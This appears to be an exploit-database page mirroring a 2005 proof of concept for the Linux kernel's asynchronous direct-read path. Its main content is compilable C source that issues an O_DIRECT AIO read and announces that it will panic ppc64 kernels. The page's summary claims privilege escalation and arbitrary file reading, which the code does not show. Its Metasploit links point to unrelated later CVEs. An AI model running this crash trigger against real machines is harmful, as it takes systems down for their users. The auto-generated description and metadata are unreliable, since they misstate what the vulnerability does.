header-logo
Suggest Exploit
vendor:
Linux Kernel
by:
Daniel McNeil
7.5
CVSS
HIGH
AIO Direct Read Local Privilege Escalation
264
CWE
Product Name: Linux Kernel
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE: CVE not mentioned
CPE: o:linux:linux_kernel
Metasploit: https://www.rapid7.com/db/vulnerabilities/freebsd-cve-2022-23499/https://www.rapid7.com/db/vulnerabilities/suse-cve-2022-3643/https://www.rapid7.com/db/vulnerabilities/ubuntu-cve-2022-3643/https://www.rapid7.com/db/vulnerabilities/debian-cve-2022-3643/https://www.rapid7.com/db/vulnerabilities/amazon_linux-cve-2022-3643/https://www.rapid7.com/db/vulnerabilities/amazon-linux-ami-2-cve-2022-3643/https://www.rapid7.com/db/vulnerabilities/oracle_linux-cve-2022-3172/https://www.rapid7.com/db/vulnerabilities/alma_linux-cve-2021-20325/https://www.rapid7.com/db/vulnerabilities/oracle_linux-cve-2021-20325/https://www.rapid7.com/db/vulnerabilities/centos_linux-cve-2021-20325/https://www.rapid7.com/db/vulnerabilities/redhat_linux-cve-2021-20325/https://www.rapid7.com/db/vulnerabilities/debian-cve-2021-37698/https://www.rapid7.com/db/vulnerabilities/suse-cve-2021-37698/https://www.rapid7.com/db/vulnerabilities/amazon-linux-ami-2-cve-2020-25686/https://www.rapid7.com/db/vulnerabilities/oracle-solaris-cve-2020-25686/https://www.rapid7.com/db/vulnerabilities/huawei-euleros-2_0_sp2-cve-2020-25686/https://www.rapid7.com/db/vulnerabilities/alma_linux-cve-2020-25686/https://www.rapid7.com/db/vulnerabilities/huawei-euleros-2_0_sp9-cve-2020-25686/https://www.rapid7.com/db/vulnerabilities/redhat-openshift-cve-2020-25686/https://www.rapid7.com/db/vulnerabilities/huawei-euleros-2_0_sp3-cve-2020-25686/https://www.rapid7.com/db/?q=CVE+not+mentioned&type=&page=2https://www.rapid7.com/db/?q=CVE+not+mentioned&type=&page=3https://www.rapid7.com/db/?q=CVE+not+mentioned&type=&page=2
Other Scripts:
Platforms Tested: Linux
2005

Proof of Concept by Daniel McNeil

This proof of concept code demonstrates a vulnerability in the AIO (Asynchronous Input/Output) functionality in Linux. It allows a local attacker to escalate their privileges by reading arbitrary files with the permissions of the targeted process. The vulnerability exists due to improper handling of IOCBs (I/O Control Blocks) in the do_aio_direct_read() function. By exploiting this vulnerability, an attacker can bypass file permissions and read sensitive information.

Mitigation:

To mitigate this vulnerability, it is recommended to apply the latest patches and updates provided by the Linux distribution. Additionally, ensure that file permissions are properly configured to restrict access to sensitive files.
Source

Exploit-DB raw data:

//
// Proof of Concept by Daniel McNeil
// compile using cc -o aiodio_read aiodio_read.c -laio
//

#define _XOPEN_SOURCE 600 
#define _GNU_SOURCE 


#include <unistd.h> 
#include <stdlib.h> 
#include <stdio.h> 
#include <string.h> 
#include <errno.h> 
#include <sys/fcntl.h> 
#include <sys/mman.h> 
#include <sys/wait.h> 
#include <sys/stat.h> 


#include <libaio.h> 


int pagesize; 
char *iobuf; 
io_context_t myctx; 
int aio_maxio = 4; 


/* 
* do a AIO DIO write 
*/ 
int do_aio_direct_read(int fd, char *iobuf, int offset, int size) 
{ 
struct iocb myiocb; 
struct iocb *iocbp = &myiocb; 
int ret; 
struct io_event e; 
struct stat s; 


io_prep_pread(&myiocb, fd, iobuf, size, offset); 
if ((ret = io_submit(myctx, 1, &iocbp)) != 1) { 
perror("io_submit"); 
return ret; 
} 


ret = io_getevents(myctx, 1, 1, &e, 0); 


if (ret) { 
struct iocb *iocb = e.obj; 
int iosize = iocb->u.c.nbytes; 
char *buf = iocb->u.c.buf; 
long long loffset = iocb->u.c.offset; 


printf("AIO read of %d at offset %lld returned %d\n", 
iosize, loffset, e.res); 
} 


return ret; 



} 


int main(int argc, char *argv[]) 
{ 
char *filename; 
int fd; 
int err; 

filename = "test.aio.file"; 
fd = open(filename, O_RDWR|O_DIRECT|O_CREAT|O_TRUN­C, 0666); 


pagesize = getpagesize(); 
err = posix_memalign((void**) &iobuf, pagesize, pagesize); 
if (err) { 
fprintf(stderr, "Error allocating %d aligned bytes.\n", 
pagesize); 
exit(1); 
} 
err = write(fd, iobuf, pagesize); 
if (err != pagesize) { 
fprintf(stderr, "Error ret = %d writing %d bytes.\n", 
err, pagesize); 
perror(""); 
exit(1); 
} 
memset(&myctx, 0, sizeof(myctx)); 
io_queue_init(aio_maxio, &myctx); 
err = do_aio_direct_read(fd, iobuf, 0, pagesize); 
close(fd); 


printf("This will panic on ppc64\n"); 
return err; 

}

// milw0rm.com [2005-04-04]